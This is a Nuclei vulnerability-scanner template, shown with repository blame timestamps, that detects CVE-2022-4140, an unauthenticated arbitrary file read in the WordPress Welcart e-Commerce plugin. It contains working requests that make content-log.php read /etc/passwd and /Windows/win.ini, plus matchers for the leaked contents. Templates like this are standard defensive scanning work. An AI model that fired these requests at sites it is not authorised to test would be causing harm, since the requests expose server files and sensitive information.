nuclei-templates/http/cves/2022/CVE-2022-4140.yaml

55 lines
1.7 KiB
YAML
Raw Normal View History

2023-03-31 11:28:24 +00:00
id: CVE-2022-4140
info:
name: WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access
2023-03-31 11:28:24 +00:00
author: theamanrawat
severity: high
description: |
WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 2.8.5.
2023-03-31 11:28:24 +00:00
reference:
- https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7
- https://wordpress.org/plugins/usc-e-shop/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4140
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-4140
cwe-id: CWE-552
2023-08-31 11:46:18 +00:00
epss-score: 0.00516
epss-percentile: 0.73753
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
2023-03-31 11:28:24 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: collne
product: welcart_e-commerce
2023-09-06 11:59:08 +00:00
framework: wordpress
tags: usc-e-shop,wpscan,cve,cve2022,wp-plugin,wp,wordpress,lfi,unauthenticated
2023-03-31 11:28:24 +00:00
http:
2023-03-31 11:28:24 +00:00
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2023-03-31 11:28:24 +00:00
matchers-condition: and
matchers:
2023-07-11 19:49:27 +00:00
- type: word
part: header
words:
- "text/html"
2023-03-31 11:28:24 +00:00
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200